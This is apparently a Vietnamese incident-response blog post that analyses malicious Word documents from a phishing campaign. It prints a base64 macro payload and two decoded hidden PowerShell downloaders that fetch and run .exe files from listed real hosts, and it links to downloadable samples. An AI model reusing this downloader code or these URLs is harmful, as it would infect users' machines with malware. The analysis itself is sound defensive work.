Phân tích vài mẫu mã độc nhúng trong File MS Word

Vào một buổi sáng đẹp trời, khách hàng thông báo rằng, họ nhận được rất nhiều email giả danh lãnh đạo :v trong email đó có rất nhiều đường link đáng ngờ, nên nhờ chúng tôi phân tích và đưa ra giải pháp xử lý.

Việc đầu tiên cần làm là chặn tất cả các kết nối đến các đường link độc hại trên. Một điều may mắn là hệ thống của khách hàng sử dụng proxy cho tất cả các kết nối internet nên việc chặn các trang web độc hại được thực hiện khá là nhanh chóng, hơn nữa việc log đầy đủ thông tin truy cập internet của người dùng sẽ dễ dàng xác định được số lượng người dùng đã click vào đường link độc hại hoặc đã bị nhiễm malware.

Dưới đây là các đường link độc hại mà chúng tôi thu thập được dựa trên các thông tin khách hàng cung cấp.

Lưu ý: Các link dưới đây có thể vẫn còn chứa những đoạn mã gây nguy hại cho máy tính của các bạn

• hxxp://benbirdsong.com/DLZP020721/ 
• hxxp://danielmerchen.com/TZEX247131/ 
• hxxp://pkfans.com/KCOK937437/ 
• hxxp://vafotografia.com.br/SUOZ110455/ 
• hxxp://bradnance.com/ZRXE577815/

Sau khi tải hết các file từ các site trên về chúng tôi nhận thấy chỉ có duy nhất 2 mẫu chính mà thôi. Và cũng không có gì ngạc nhiên khi các antivirus không thể nhận diện được 2 mẫu này.

Làm việc với "em" đầu tiên https://virustotal.com/en/file/b5f30f3f12d8337750943f35a076e3c9690bd18505f7eb31101c98c72f454629/analysis/1500961161/

Dễ dàng ta thấy rằng hai file trên thuộc dạng file MS Word 97-2003

À đùa chút thôi 😄

Mẫu này không hề giống với mẫu RTF mà anh Kienmanowar đã phân tích. 
Dùng thử tool Officemalscanner thì không thấy mã độc đâu hết 😕 Chắc là do nó chỉ có VBA script 😁

Thôi đành dùng bộ oletools vậy:

Nhìn cái mớ hổ lốn này cũng mệt 🙈 Làm đẹp nó lại với ViperMonkey 😈. Tập trung vào hàm Document_Open() và tính toán sơ bộ ta có một chuỗi base64:

cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9qcGdwaG90b2V2ZW50cy5jb20vdS8saHR0cDovL3Byb2RldmluYy5jb20vY3p3amZ1Z3dqLyxodHRwOi8vbGVjaGVsZW9uLmNvbS93cC1jb250ZW50L290dXhpLyxodHRwOi8vcnlhbmtlaXNlci5uZXQvdmtyc2dueWNzYS8saHR0cDovL3p2YXJnYS5jb20veXZ2c3AvJy5TcGxpdCgnLCcpOyRuYW1lID0gJHJhbmRvbS5uZXh0KDEsIDY1NTM2KTskcGF0aCA9ICRlbnY6dGVtcCArICdcJyArICRuYW1lICsgJy5leGUnO2ZvcmVhY2goJHVybCBpbiAkdXJscyl7dHJ5eyR3ZWJjbGllbnQuRG93bmxvYWRGaWxlKCR1cmwuVG9TdHJpbmcoKSwgJHBhdGgpO1N0YXJ0LVByb2Nlc3MgJHBhdGg7YnJlYWs7fWNhdGNoe3dyaXRlLWhvc3QgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7fX0=

Giờ thì dễ dàng ta có đoạn code như sau:

powershell -WindowStyle Hidden
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://jpgphotoevents.com/u/,http://prodevinc.com/czwjfugwj/,http://lecheleon.com/wp-content/otuxi/,http://ryankeiser.net/vkrsgnycsa/,http://zvarga.com/yvvsp/'.Split(','); $name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
try{
$webclient.DownloadFile($url.ToString(), $path);
Start-Process $path;
break;
}catch{
write-host $_.Exception.Message;
}
}

Các link trên download về được 2 file .EXE khác nhau:

• https://virustotal.com/en/file/d6a2d140948734caabf7c61d704860778c9179f7e1329da1371cfe352eabe605/analysis/1500966200/
• https://virustotal.com/en/file/8f8244336ed6618c17bd43157321171a65bd5b20a076af7d92c3b55fbd13c518/analysis/

Tương tự với file https://virustotal.com/en/file/b5f30f3f12d8337750943f35a076e3c9690bd18505f7eb31101c98c72f454629/analysis/

Ta dễ dàng có được đoạn code sau:

powershell -WindowStyle Hidden
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://siindia.in/oagcmggpa/,http://www.todofrog.com/pzpk/,http://segurodecenalsinoct.segurox.es/gn/,http://rgv2.com/wjblnwy/,http://gracetheweb.co.uk/cdybh/'.Split(','); $name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
try{
$webclient.DownloadFile($url.ToString(), $path);
Start-Process $path;
break;
}catch{
write-host $_.Exception.Message;
}
}

Từ đống link trên ta thu được một file https://virustotal.com/en/file/7beddab6ff9b2c1049a7fc31becca3230e00be160505af10b287d5fa26d815b7/analysis/

Công việc tiếp theo là submit hết các file cho đám AV. Đồng thời rà soát lại log trên hệ thống tập trung và phối hợp với IThelpdesk tiến hành gỡ bỏ malware trên các máy đã bị nhiễm.

Đến đây tạm ổn rồi kéo anh em đi nhậu cho khỏe chứ không rảnh phân tích đám file EXE kia 😎

Link download mẫu cho bạn nào cần https://drive.google.com/open?id=0B6x4m_EtB2wBeTRKM0xhbWhQLVk sử dụng password kinh điển để giải nén.